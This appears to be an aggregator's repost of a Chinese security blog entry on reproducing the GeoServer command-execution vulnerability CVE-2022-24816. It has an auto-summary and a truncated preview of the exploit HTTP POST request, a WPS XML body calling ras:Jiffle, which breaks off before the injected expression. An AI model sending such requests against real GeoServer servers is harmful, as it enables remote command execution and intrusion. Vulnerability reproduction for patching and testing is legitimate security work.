今天看啥  ›  专栏  ›  F12sec

1day分享 | Geoserver命令执行漏洞

F12sec  · 公众号  · 互联网安全  · 2024-05-24 11:20
    

主要观点总结

文章描述了关于CVE-2022-24816的geoserver命令执行漏洞的复现信息。

关键观点总结

关键观点1: 漏洞名称及CVE编号

该文章讨论的是关于geoserver的CVE-2022-24816命令执行漏洞。

关键观点2: 访问地址及协议

可以通过http://127.0.0.1/geoserver/ows来访问此漏洞。

关键观点3: 请求方法

文章中使用的是POST方法,路径为/geoserver/wms。

关键观点4: 请求头部信息

请求头包含了Host、Content-Type、Accept-Encoding等信息,并且编码使用UTF-8。

关键观点5: 请求内容示例

文章提供了一个请求内容的示例,包括ras:Jiffle和图像格式(image/tiff)的结果。


文章预览

漏洞复现 CVE-2022-24816,geoserver命令执行漏洞 访问:http://127.0.0.1/geoserver/ows poc POST /geoserver/wms HTTP/1.1 Host: xxxxxxxxx Content-Type: application/xml Accept-Encoding: gzip, deflate "1.0" encoding= "UTF-8" ?>    "1.0.0" service= "WPS"  xmlns:xsi= "http://www.w3.org/2001/XMLSchema-instance"  xmlns= "http://www.opengis.net/wps/1.0.0"  xmlns:wfs= "http://www.opengis.net/wfs"  xmlns:wps= "http://www.opengis.net/wps/1.0.0"  xmlns:ows= "http://www.opengis.net/ows/1.1"  xmlns:gml= "http://www.opengis.net/gml"  xmlns:ogc= "http://www.opengis.net/ogc"  xmlns:wcs= "http://www.opengis.net/wcs/1.1.1"  xmlns:xlink= "http://www.w3.org/1999/xlink"  xsi:schemaLocation= "http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd" >      ras:Jiffle                                            "image/tiff">          result                ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览